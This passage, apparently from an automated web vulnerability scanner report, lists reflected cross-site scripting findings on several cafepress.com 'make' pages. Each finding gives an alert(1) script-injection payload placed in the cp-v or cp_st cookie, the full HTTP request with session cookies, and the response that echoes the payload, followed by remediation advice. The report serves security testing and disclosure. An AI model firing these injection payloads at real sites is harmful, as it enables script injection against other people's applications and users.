cp-v=D0026F27AADDAF9A26C54608326FC1BA46ce6"-alert(1)-"366e3ae2b93; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW16
Cteonnt-Length: 53742
Date: Sun, 26 Dec 2010 13:48:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 53742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA46ce6"-alert(1)-"366e3ae2b93";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.111. http://www.cafepress.com/make/custom-mugs [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/custom-mugs

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0403</script><script>alert(1)</script>51550576faa was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /make/custom-mugs HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=d0403</script><script>alert(1)</script>51550576faa; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW16
Cteonnt-Length: 53764
Date: Sun, 26 Dec 2010 13:48:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 53764

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
omain_us = 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = 'd0403</script><script>alert(1)</script>51550576faa'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'Direct'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP
...[SNIP]...

1.112. http://www.cafepress.com/make/custom-stickers [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/custom-stickers

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 181d3"-alert(1)-"e0b5be905e5 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /make/custom-stickers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA181d3"-alert(1)-"e0b5be905e5; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 55169
Date: Sun, 26 Dec 2010 13:48:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 55169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA181d3"-alert(1)-"e0b5be905e5";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.113. http://www.cafepress.com/make/custom-stickers [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/custom-stickers

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4548</script><script>alert(1)</script>1bf2219952e was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /make/custom-stickers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=a4548</script><script>alert(1)</script>1bf2219952e; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW17
Cteonnt-Length: 55191
Date: Sun, 26 Dec 2010 13:48:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 55191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
omain_us = 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = 'a4548</script><script>alert(1)</script>1bf2219952e'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_08
...[SNIP]...

1.114. http://www.cafepress.com/make/custom-stockings [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/custom-stockings

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a524"-alert(1)-"630f88fb7a4 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /make/custom-stockings HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA1a524"-alert(1)-"630f88fb7a4; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 52631
Date: Sun, 26 Dec 2010 13:48:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 52631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA1a524"-alert(1)-"630f88fb7a4";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.115. http://www.cafepress.com/make/custom-stockings [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/custom-stockings

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75fbc</script><script>alert(1)</script>3209aface0d was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /make/custom-stockings HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=75fbc</script><script>alert(1)</script>3209aface0d; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 52650
Date: Sun, 26 Dec 2010 13:48:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 52650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
omain_us = 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = '75fbc</script><script>alert(1)</script>3209aface0d'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_08
...[SNIP]...

1.116. http://www.cafepress.com/make/custom-t-shirts [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/custom-t-shirts

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8dde"-alert(1)-"0740f775c1c was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /make/custom-t-shirts HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
